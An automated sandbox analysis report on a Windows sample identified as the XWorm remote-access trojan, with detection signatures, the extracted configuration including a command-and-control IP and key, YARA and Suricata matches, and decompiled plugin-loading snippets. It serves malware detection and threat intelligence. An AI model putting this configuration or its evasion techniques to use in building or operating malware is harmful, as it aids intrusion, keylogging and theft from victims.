Edit tour

Windows Analysis Report
1.exe

Overview

General Information

Sample name:	1.exe
Analysis ID:	1583226
MD5:	47f8252df69f15858c9ebb9e27ee2201
SHA1:	e6e627444c3f486e3c4aa737b968dce13281f9e7
SHA256:	4c1d652ffdc56aca82dec4b51da8a0a27f8bc5aa248b5cdebf07760f2806d0b6
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses FTP

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

1.exe (PID: 7804 cmdline: "C:\Users\user\Desktop\1.exe" MD5: 47F8252DF69F15858C9EBB9E27EE2201)

WerFault.exe (PID: 3632 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7804 -s 1764 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["45.207.215.58"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x6a9db:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\1[1].bin	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3120815982.00000000034C0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xffd9:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.3120835473.00000000035C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x58a9:$str01: $VB$Local_Port 0x589a:$str02: $VB$Local_Host 0x5ba0:$str03: get_Jpeg 0x5552:$str04: get_ServicePack 0x656e:$str05: Select * from AntivirusProduct 0x676c:$str06: PCRestart 0x6780:$str07: shutdown.exe /f /r /t 0 0x6832:$str08: StopReport 0x6808:$str09: StopDDos 0x68fe:$str10: sendPlugin 0x697e:$str11: OfflineKeylogger Not Enabled 0x6ad6:$str12: -ExecutionPolicy Bypass -File " 0x6bff:$str13: Content-length: 5235
00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6ca8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6b1a:$cnc4: POST / HTTP/1.1
Process Memory Space: 1.exe PID: 7804	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.1.exe.61d0000.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.1.exe.61d0000.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x58a9:$str01: $VB$Local_Port 0x589a:$str02: $VB$Local_Host 0x5ba0:$str03: get_Jpeg 0x5552:$str04: get_ServicePack 0x656e:$str05: Select * from AntivirusProduct 0x676c:$str06: PCRestart 0x6780:$str07: shutdown.exe /f /r /t 0 0x6832:$str08: StopReport 0x6808:$str09: StopDDos 0x68fe:$str10: sendPlugin 0x697e:$str11: OfflineKeylogger Not Enabled 0x6ad6:$str12: -ExecutionPolicy Bypass -File " 0x6bff:$str13: Content-length: 5235
0.2.1.exe.61d0000.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6ca8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6b1a:$cnc4: POST / HTTP/1.1
0.2.1.exe.61d0000.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.1.exe.61d0000.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x3aa9:$str01: $VB$Local_Port 0x3a9a:$str02: $VB$Local_Host 0x3da0:$str03: get_Jpeg 0x3752:$str04: get_ServicePack 0x476e:$str05: Select * from AntivirusProduct 0x496c:$str06: PCRestart 0x4980:$str07: shutdown.exe /f /r /t 0 0x4a32:$str08: StopReport 0x4a08:$str09: StopDDos 0x4afe:$str10: sendPlugin 0x4b7e:$str11: OfflineKeylogger Not Enabled 0x4cd6:$str12: -ExecutionPolicy Bypass -File " 0x4dff:$str13: Content-length: 5235
0.2.1.exe.61d0000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4ea8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x505a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4d1a:$cnc4: POST / HTTP/1.1
Click to see the 1 entries

Suricata Signatures

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:02:51.442921+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.9	50002	45.207.215.58	7000	TCP

Code function: 0_2_00BD1300 _memset,_memset,_memset,_memset,_memset,_memset,lstrlenA,lstrcatA,InternetOpenA,InternetConnectA,FtpOpenFileA,FtpGetFileSize,_memset,_memset,InternetReadFile,_memmove,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00BD1300

Source: 1.exe, 00000000.00000002.3121287747.0000000004061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net

Source: C:\Users\user\Desktop\1.exe

Code function: 0_2_00C24091 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,SendMessageA,

0_2_00C24091

Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C2A0A1 GetParent,GetKeyState,GetKeyState,GetKeyState,SendMessageA,SendMessageA,SendMessageA,	0_2_00C2A0A1
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C000A4 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,	0_2_00C000A4
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C42189 GetKeyState,GetKeyState,GetKeyState,GetKeyState,	0_2_00C42189
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C72138 GetWindowRect,GetKeyState,GetKeyState,GetKeyState,KillTimer,GetFocus,SetTimer,	0_2_00C72138
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C294DE MessageBeep,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetKeyState,SendMessageA,GetKeyState,SendMessageA,SendMessageA,GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,SendMessageA,GetKeyState,SendMessageA,GetKeyState,SendMessageA,SendMessageA,	0_2_00C294DE
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C097D6 IsWindow,SendMessageA,GetCapture,GetKeyState,GetKeyState,GetKeyState,ImmGetContext,ImmGetOpenStatus,ImmReleaseContext,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,	0_2_00C097D6
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C078B1 IsWindow,SendMessageA,GetCapture,GetKeyState,GetKeyState,GetKeyState,ImmGetContext,ImmGetOpenStatus,ImmReleaseContext,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,	0_2_00C078B1

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.1.exe.61d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.1.exe.61d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.1.exe.61d0000.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.1.exe.61d0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3120815982.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3120835473.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\1[1].bin, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\1.exe

Code function: 0_2_00BD15B0 GetCurrentProcess,GetCurrentProcess,CheckRemoteDebuggerPresent,GetCurrentProcess,GetModuleHandleA,GetProcAddress,NtQueryInformationProcess,VirtualAlloc,_memmove,InitOnceExecuteOnce,

0_2_00BD15B0

Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00CC8113	0_2_00CC8113
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C3E447	0_2_00C3E447
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00CD68EC	0_2_00CD68EC
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C3D3AB	0_2_00C3D3AB
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C4B802	0_2_00C4B802
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00BF5B75	0_2_00BF5B75
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C5FF24	0_2_00C5FF24
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_061E4D08	0_2_061E4D08
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_061E55D8	0_2_061E55D8
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_061E07A0	0_2_061E07A0
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_061E49C0	0_2_061E49C0

Source: C:\Users\user\Desktop\1.exe	Code function: String function: 00CC6F35 appears 207 times
Source: C:\Users\user\Desktop\1.exe	Code function: String function: 00CC71E0 appears 32 times
Source: C:\Users\user\Desktop\1.exe	Code function: String function: 00CC6F9E appears 59 times

Source: C:\Users\user\Desktop\1.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7804 -s 1764

Source: 1.exe, 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMFC.exe8 vs 1.exe
Source: 1.exe, 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs 1.exe
Source: 1.exe	Binary or memory string: OriginalFilenameMFC.exe8 vs 1.exe

Source: 1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.1.exe.61d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.1.exe.61d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.1.exe.61d0000.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.1.exe.61d0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3120815982.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3120835473.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\1[1].bin, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 0.2.1.exe.61d0000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.1.exe.61d0000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.1.exe.61d0000.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/6@0/1

Source: C:\Users\user\Desktop\1.exe

Code function: 0_2_00BE64AF CoInitialize,CoCreateInstance,

0_2_00BE64AF

Source: C:\Users\user\Desktop\1.exe

Code function: 0_2_00CC2117 GetUserDefaultUILanguage,FindResourceExW,FindResourceW,LoadResource,GlobalAlloc,

0_2_00CC2117

Source: C:\Users\user\Desktop\1.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\1[1].bin

Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Mutant created: \Sessions\1\BaseNamedObjects\NYmC8Y1oU9E9ZfYB
Source: C:\Users\user\Desktop\1.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7804

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\4bfa8594-1b02-4f5e-8716-7262d82a62fa

Jump to behavior

Source: 1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1.exe	Virustotal: Detection: 18%
Source: 1.exe	ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"
Source: C:\Users\user\Desktop\1.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7804 -s 1764

Source: C:\Users\user\Desktop\1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: msvfw32.dll	Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\1.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 1.exe

Static file information: File size 1684480 > 1048576

Source: 1.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x118600

Source: 1.exe

Static PE information: More than 200 imports for USER32.dll

Source: 1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: @To.pdb source: 1.exe, 00000000.00000002.3122007292.000000000649B000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdbRSDS source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[z source: 1.exe, 00000000.00000002.3120059123.00000000013DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 1.exe, 00000000.00000002.3120059123.00000000013DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.pdb source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: ?ToC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 1.exe, 00000000.00000002.3122007292.000000000649B000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: %%.pdb source: 1.exe, 00000000.00000002.3122007292.000000000649B000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: 1.exe, 00000000.00000002.3122041268.00000000065AF000.00000004.00000020.00020000.00000000.sdmp, WER5E6A.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[ source: 1.exe, 00000000.00000002.3122007292.000000000649B000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: System.Management.pdb source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdb source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: System.Management.ni.pdb source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: System.Core.pdb source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: 1.exe, 00000000.00000002.3122007292.000000000649B000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdbMZ@ source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdb source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER5E6A.tmp.dmp.9.dr
Source:	Binary string: HPHo0C:\Windows\mscorlib.pdb source: 1.exe, 00000000.00000002.3122007292.000000000649B000.00000004.00000010.00020000.00000000.sdmp

Source: 1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.1.exe.61d0000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.1.exe.61d0000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.1.exe.61d0000.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.1.exe.61d0000.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.1.exe.61d0000.1.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\1.exe

Code function: 0_2_00CD8529 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00CD8529

Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00CC700D push ecx; ret	0_2_00CC7020
